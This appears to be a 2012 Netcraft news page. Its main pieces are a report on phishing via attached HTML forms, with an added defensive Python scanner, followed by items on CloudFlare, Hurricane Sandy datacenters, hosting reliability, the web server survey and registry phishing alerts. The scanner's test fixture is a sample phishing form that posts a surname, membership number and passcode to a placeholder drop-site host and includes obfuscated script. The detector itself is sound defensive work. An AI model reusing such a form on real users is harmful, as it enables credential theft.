Phishing attacks using HTML attachments

Netcraft has recently seen an increase in the number of phishing attacks using attached HTML forms to steal victims' credentials. This type of attack is not new - we have received reports of it from our phishing community since 2005 - but it has become more popular amongst fraudsters this year.

The attack works in a conventional way with the distinction that instead of linking to a form hosted on a web server, the form is attached to the mail.

Example drop site mail

A drop site phishing mail against Barclays customers asking the recipient to complete the attached form.

On opening the attachment, the form asks the victim to fill in their credentials. However, because the form is stored locally, it is less likely to be blocked by anti-phishing mechanisms. Some attachments also use obfuscated JavaScript to try to prevent anti-phishing software from detecting the fraudulent content.

Form attachment screenshot

The form is hosted locally on the user's own computer.

Nevertheless, these phishing attacks still have to send the sensitive data to the fraudster. This is usually done by sending a POST request to a remote web server, which then processes the information. This POST request can be detected and blocked, so the user can still be protected. For example, a web browser, a piece of security software or a spam filter can use Netcraft's Phishing Site Feed to detect the phishing attack and block it.

Code snippet of the HTML form element

The form posts the details to a remote web-server.

These phishing attacks are sometimes referred to as "drop site" phishing attacks, because the only publicly accessible URL is a page into which the victim's details are "dropped". Drop sites can be difficult to recognise without the accompanying phishing mail. Usually, the "drop" page just processes the victim's details and provides no indication as to its true nature. Some drop sites redirect to the target's real website. This looks suspicious to anti-phishing groups, but may not provide enough evidence for them to block the URL without the accompanying mail.

HTTP Headers for an example drop site

Without the accompanying mail, the drop site URL appears to just be a page that redirects.
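The defender's side of the attack described above is to look inside the attachment rather than at a hosted page: the form's action attribute is the drop site URL, and the input fields show what is being harvested. The following script is an added example, not Netcraft's code or the feed discussed on this page. It parses a constructed sample mail (the drop-site host name and field names are placeholders), extracts every form that posts to a remote host, lists the credential-style fields it collects, and notes common obfuscation calls in any embedded script, so the extracted URL can be forwarded with the original mail as the article recommends.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample attachment: the kind of locally opened HTML form the
# article describes. "drop-site.example" is a placeholder, not a real indicator.
SAMPLE_ATTACHMENT = """<html><body>
<script>var s = unescape("%3Cb%3ESecure%20form%3C%2Fb%3E"); document.write(s);</script>
<form method="POST" action="http://drop-site.example/process.php">
  Surname <input type="text" name="surname">
  Membership number <input type="text" name="membership">
  Passcode <input type="password" name="passcode">
  <input type="submit" value="Continue">
</form></body></html>"""

# Constructed sample mail carrying the form as an attachment.
SAMPLE_MAIL = (
    "From: security@bank.example\r\n"
    "To: victim@example.org\r\n"
    "Subject: Please complete the attached form\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="b1"\r\n\r\n'
    "--b1\r\nContent-Type: text/plain\r\n\r\nPlease open the attached form.\r\n"
    '--b1\r\nContent-Type: text/html; name="form.html"\r\n'
    'Content-Disposition: attachment; filename="form.html"\r\n\r\n'
    + SAMPLE_ATTACHMENT + "\r\n--b1--\r\n"
)

# Field-name fragments that usually indicate a credential or card detail.
CREDENTIAL_HINTS = ("pass", "pin", "secret", "card", "cvv", "ssn", "account")
# Calls frequently seen in obfuscated script; their presence is a hint, not proof.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "atob(")


class FormExtractor(HTMLParser):
    """Collect every <form> with its action/method, its inputs, and all script text."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.script_text = ""
        self._current = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "GET").upper(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({"name": a.get("name") or "",
                                            "type": (a.get("type") or "text").lower()})
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text += data


def analyse_attachment(html_text):
    """Return the forms that submit to a remote host and any obfuscation markers."""
    p = FormExtractor()
    p.feed(html_text)
    remote_forms = []
    for f in p.forms:
        host = urlsplit(f["action"]).netloc
        if not host:
            continue  # relative/local target: nothing leaves the machine
        cred = [i["name"] for i in f["inputs"]
                if i["type"] == "password"
                or any(h in i["name"].lower() for h in CREDENTIAL_HINTS)]
        remote_forms.append({"drop_url": f["action"], "host": host,
                             "method": f["method"], "credential_fields": cred})
    markers = [m for m in OBFUSCATION_MARKERS if m in p.script_text]
    return {"remote_forms": remote_forms, "script_markers": markers}


def scan_mail(raw):
    """Analyse every HTML attachment of a raw RFC 822 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    results = []
    for part in msg.iter_attachments():
        if part.get_content_type() == "text/html":
            finding = analyse_attachment(part.get_content())
            finding["filename"] = part.get_filename()
            results.append(finding)
    return results


if __name__ == "__main__":
    for finding in scan_mail(SAMPLE_MAIL):
        print(finding)
```

Run against a mailbox export, the drop_url values are what an abuse desk or feed provider needs; a form whose action is relative (no host) is ignored because it cannot exfiltrate anything on its own.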

Netcraft has recently improved its detection and handling of drop sites. Drop sites should be reported to Netcraft by forwarding the original phishing mail, including the HTML attachment(s), to scam@netcraft.com.

As of 1st November 2012, the Netcraft Toolbar community has blocked over 5.5 million phishing attacks. To provide an incentive for the community to continue sending Netcraft reports of phishing sites, Netcraft currently sends reporters the following:

Prize                   When
Netcraft Branded Mug    after 100 validated phishing reports
Netcraft Polo Shirt     after 400
Targus Laptop Backpack  after 1,000
iPad                    after 5,000

As a further incentive, reporters become eligible for a separate competition when they reach 5,000 validated reports. To track the progress, we have a leaderboard displaying the people with the largest number of accepted reports so far this month.

CloudFlare accelerates 235,000 websites

Just over two years since its launch, the CloudFlare content distribution network is being actively used to accelerate traffic to more than 235,000 websites in Netcraft's Web Server Survey. In total, we found 785,000 sites currently configured to use CloudFlare's DNS servers. Once a domain has been configured to use these servers, any of its subdomains can be routed through the CloudFlare system at the click of a button. Paying customers can also route their traffic through CloudFlare by setting up a CNAME within their own DNS.

CloudFlare's network is globally spread across 23 datacenters, half of which are entirely remotely operated. Nine of these datacenters were opened during a month-long expansion effort which ended in August and resulted in a 70% increase in network capacity. CloudFlare's content distribution network spreads website content around these datacenters, allowing visitors to request pages from geographically closer locations. This typically reduces the number of network hops, resulting in an average request taking less than 30ms.

In addition to moving static files closer to visitors, CloudFlare also offers an automatic web optimisation feature called Rocket Loader. This combines multiple JavaScript files into a single request, which saves both time and bandwidth. Pro, Business and Enterprise users can also enable beta support for SPDY requests, which achieve better latency than HTTP through the use of compression, multiplexing and prioritisation.

In October, CloudFlare introduced support for OCSP stapling, which it claims has increased the speed of SSL requests by 30%. The Online Certificate Status Protocol allows browsers to ask a certificate authority (CA) whether an SSL certificate it has issued has been revoked. Handling these requests in real time can be challenging, particularly if the CA has issued a large number of certificates, or has issued certificates to extremely busy websites. OCSP stapling solves this problem by delivering the OCSP response directly from CloudFlare's network, removing the need for the browser to perform an additional DNS lookup and send a request to the CA's own OCSP server. OCSP performance is often overlooked when considering which CA to buy a certificate from, but it can have a crucial impact on the overall performance of a customer's website.

With its insight into the kind of requests being sent to many different websites, CloudFlare is well-positioned to identify malicious traffic and provide protection to all of its customers. Depending on which level of security is enabled, CloudFlare can deny requests which are attempting SQL injection attacks, comment spam, excessive crawling, email harvesting, or exploiting cross-site scripting vulnerabilities. Business and Enterprise users can also benefit from CloudFlare's advanced DDoS (distributed denial of service) protection.

CloudFlare's growth accelerated significantly in the summer of last year. This is when many people first became aware of the service, after it was used to handle traffic for the Lulz Security website. High profile attacks against Sony, Fox, PBS and the X Factor helped LulzSec garner 350,000 followers on Twitter, where it extolled the virtues of using CloudFlare to mitigate DDoS attacks.

Some notable high-traffic users of CloudFlare include The Hacker News, Uber Humor, Android firmware site Cyanogen Mod, and the content management system Moodle.

New York Internet rides out the storm

New York Internet looks set to make it through the aftermath of Hurricane Sandy with barely a scratch on its uptime or performance.

NYI's New York City datacenter is just a third of a mile away from the 75 Broad Street datacenter (in evacuation Zone A), which flooded during Hurricane Sandy. NYI is crucially further uphill, in Zone C, and was out of reach of the storm surge. Despite widespread power failures within the area, NYI has so far managed to continue operating without suffering from any outages:

Demand for fuel is very high in the areas affected by the storm. Phillip Koblence, founder of NYI, said that poor availability of gasoline for staff to get to and from datacenters was his worst problem, followed by sleeping and washing facilities. Queues to get gasoline were reportedly two miles long, and vehicles containing fewer than 3 people were not being allowed into Manhattan between 6am and midnight.

Koblence told Netcraft that he had no power or water at home, and difficulties getting food anywhere near work were also adding to the problems. NYI expected commercial power to be shut off as the storm hit, and its New Jersey and New York City datacenters have been running on diesel generators since Monday.

NYI's New York City datacenter is only a few blocks away from the flooded 75 Broad Street datacenter.

NYI estimates that its 21st floor generator tank in Manhattan can last for 36 hours, while its 8th floor generator can run for more than 3 days. The Bridgewater datacenter in New Jersey is believed to be capable of lasting at least 10 days on generators, far longer than the times between each fuel delivery that the company has been sustaining this week.

Commercial power is expected to be restored to the datacenters late on Saturday night, although NYI plans to remain on generator power until the commercial power supply becomes stable.

Queuing for gasoline in Bridgewater.

Live performance graphs for www.nyi.net can be viewed here.

Most Reliable Hosting Company Sites in October 2012

Rank  Company site            OS                   Outage    Failed  DNS    Connect  First  Total
                                                   hh:mm:ss  Req%                    byte
1     Datapipe                FreeBSD                        0.000   0.071  0.018    0.038  0.057
2     Qube Managed Services   Linux                0:00:00   0.007   0.132  0.071    0.142  0.142
3     XILO Communications Ltd.  Linux              0:00:00   0.007   0.331  0.132    0.388  0.668
4     iWeb                    Linux                0:00:00   0.010   0.137  0.085    0.171  0.171
5     INetU                   Windows Server 2008  0:00:00   0.013   0.092  0.090    0.266  0.535
6     www.logicworks.net      Linux                0:00:00   0.017   0.212  0.089    0.444  0.683
7     Server Intellect        Windows Server 2008  0:00:00   0.017   0.058  0.107    0.215  0.537
8     Multacom                FreeBSD              0:00:00   0.017   0.143  0.117    0.236  0.600
9     ReliableServers.com     Linux                0:00:00   0.020   0.371  0.097    0.200  0.282
10    Swishmail               FreeBSD              0:00:00   0.024   0.127  0.071    0.141  0.285

See full table

Datapipe was the most reliable hosting company in October, impressively responding to all requests throughout the month, despite being in the area most affected by Hurricane Sandy.

Datapipe's corporate offices are based in the heart of Jersey City, very close to areas where analysts had predicted a 100% probability of a storm surge higher than 6 feet. The southern tip of Manhattan eventually experienced a storm surge of 13 feet. Datapipe founder and CEO Robb Allen told Netcraft that the effects of the storm were also felt as far inland as Somerset, where Datapipe's New Jersey datacenters are based.

After the grid became unstable on Monday, Datapipe switched to generators for their datacenter power supply. Even though their diesel reservoir was large enough to last at least four days, Datapipe also stationed additional fuel trucks on site in case roads became impassable.

Allen noted that previous events, including grid blackouts, Hurricane Irene and 9/11, have all helped the internet connectivity and hosting industry in the US north east to be better prepared for emergencies, though there is currently a lot of strain on fuel delivery systems.

Datapipe's performance and uptime remained remarkably calm before, during, and after the storm, in stark contrast to destruction depicted in photos taken during the event.

When there isn't a storm brewing, Datapipe runs its United States data centers on entirely renewable energy and is recognized by the Environmental Protection Agency as a Green Power Partner. Datapipe's other US datacenters are located in San Jose and North Virginia.

Datapipe also has datacenters in Iceland, London, Shanghai and Hong Kong. The location of the Iceland datacenter allows for free cooling and runs on 100% renewable power using only geothermal and hydroelectric energy sources. The physical infrastructure has been built with steel instead of concrete, making much of it recyclable at the end of its life.

Netcraft measures and makes available the response times of around forty leading hosting providers' sites. The performance measurements are made at fifteen minute intervals from separate points around the internet, and averages are calculated over the immediately preceding 24 hour period.

From a customer's point of view, the percentage of failed requests is more pertinent than outages on hosting companies' own sites, as this gives a pointer to the reliability of routing, and this is why we choose to rank our table by fewest failed requests rather than shortest periods of outage. In the event that the number of failed requests is equal, sites are ranked by average connection times.

Information on the measurement process and current measurements is available.

November 2012 Web Server Survey

In the November 2012 survey we received responses from 625,329,303 sites, a modest increase of 4.8 million sites since last month's survey.

Apache has continued its declining trend in market share, suffering the greatest loss this month of 0.77 percentage points. Although it still captures the majority of the market with a share of 57.23%, this has fallen from 65.00% at this time last year. Conversely, Microsoft enjoyed the largest gain this month, upping its share by 0.25 points to 16.52%, and by 1.07 points over the past year.

In absolute terms, Apache lost 2.0 million sites this month, whereas Microsoft gained 2.3 million. nginx also showed significant growth, with an additional 1.2 million sites resulting in a small increase to its market share.

Studying only active sites, the changes in market share are reversed: Apache grew by 0.23 to 55.66%, while Microsoft fell by 0.83 to 11.53%. Within the million busiest sites, nginx was the only major developer to increase its market share, which now stands at 12.22%.

November's survey saw Tumblr suddenly become the tenth largest hosting company by number of sites. The microblogging service previously hosted its customers' sites with Softlayer, but now hosts 9.2 million sites on its own netblock. Softlayer was previously the largest hosting company in the world in terms of hostnames, but this move now places that title in the hands of Go Daddy, who host nearly 6 million sites more than Softlayer.

Many sites using the .tk country code top level domain (ccTLD) disappeared from the survey this month, as non-existent domain names under this ccTLD are no longer resolved by a wildcard DNS configuration. The .tk ccTLD belongs to Tokelau (a territory of New Zealand), and is run by Dot TK - a joint venture between the Government of Tokelau, the communication company Teletok, and BV Dot TK, which is a privately held company with offices in the Netherlands, the UK and the Isle of Man.

Dot TK offers free domain names under the .tk ccTLD, which is also used by its URL shortening service. The April 2012 report by the Anti-Phishing Working Group says that .tk domains were taken advantage of extensively by phishers, and ranked .tk as the top phishing TLD by phish per 10,000 domains in the second half of 2011.

To combat phishing and other fraud, Dot TK introduced an anti-abuse API to allow trusted partners to shut down sites using the .tk ccTLD. The report notes that this has resulted in lower-than-average uptimes for phishing sites, but has not prevented phishers from obtaining and using .tk domains in the first place.

Netcraft has produced a live table of the top 50 phishiest TLDs, based on the ratio of the number of phishing sites to the total number of sites hosted within each TLD. This ranks .tk as only the 22nd phishiest TLD today, while .to (Tonga) currently ranks as the phishiest. The .to ccTLD is run by the Tonga Network Information Center (Tonic), which is one of the few ccTLD operators that does not provide registration information in a WHOIS database. This fact alone must surely contribute to the appeal of using the .to TLD for phishing and other fraud.

Developer   October 2012   Percent   November 2012   Percent   Change
Apache      359,875,516    58.00%    357,865,215     57.23%    -0.77
Microsoft   101,005,285    16.28%    103,333,170     16.52%    0.25
nginx       73,243,944     11.80%    74,437,764      11.90%    0.10
Google      20,947,340     3.38%     21,090,410      3.37%     -0.00

Phishing Alerts for Domain Registries

Monitor phishing within your top-level domains

While some registries still perceive phishing as a content issue for hosting companies and registrars, detailed knowledge of phishing activity within their Top Level Domain(s) is very beneficial for registries. It is a key data source for identifying problematic, negligent, or fraud-friendly registrars, and an essential tool for maintaining the reputation of a TLD.

It is common for hosting companies and domain registrars to unknowingly allow their infrastructure to be used for phishing. Even seemingly respectable companies may develop a reputation as a haven for fraud through some systematic deficiency in their working practices, such as a low level of resourcing for abuse-related workflow (particularly outside core working hours and during weekends), or inexperienced or less capable staff being unable to recognise and act on fraudulent content.

The most prolific hosts of .net phishing sites, October 2012

Conversely, some criminal registrars and hosting companies specialise in hosting fraudulent content, and even go so far as to advertise their services as "bullet-proof". Bullet-proof hosting companies are typically based in jurisdictions where laws may be hard to apply, and being in an informed position to decline further business from these registrars may greatly aid operational efficiency.


Professionally validated feed, relied upon throughout the industry

Netcraft's continuously updated, professionally validated phishing feed is used throughout the Internet Infrastructure industry. In addition to Internet registries, all of the main web browsers, along with major anti-virus companies, firewall vendors, SSL Certificate authorities, large hosting companies and domain registrars use Netcraft's feed to protect their user communities. Since Netcraft first launched its anti-phishing system in 2005, over 5.2 million unique phishing sites have been detected and blocked as of September 2012.


Reporting and Analysis

Reports can be refreshed hourly, and also trended over time periods of many months, with analysis by registrar, hosting company, name server, country or phishing target.

.net phishing sites by country, October 2012


Real-time Alerts

When Netcraft validates a phishing report in your TLD, you can receive an alert and can also arrange for alerts to be passed through to registrars. Acting on these individual alerts will demonstrate that your top-level domains are not welcoming to fraud. Fraudsters adjust to these signals within a short period of time, and are themselves quite efficient at moving their operations away from parts of the DNS where they are clearly unwelcome.

A refreshable Excel spreadsheet includes details of the phishing sites under the .net TLD


Case Study - Nominet .uk

Nominet is the registry responsible for managing the .uk domain, which is one of the largest ccTLDs with over 10 million domains registered as of March 2012. Netcraft has provided Nominet with information on phishing using .uk domains since 2009, with alerts made available to individual registrars via an opt-in service.


More information

Please contact us (sales@netcraft.com) for pricing or further details about any of our services.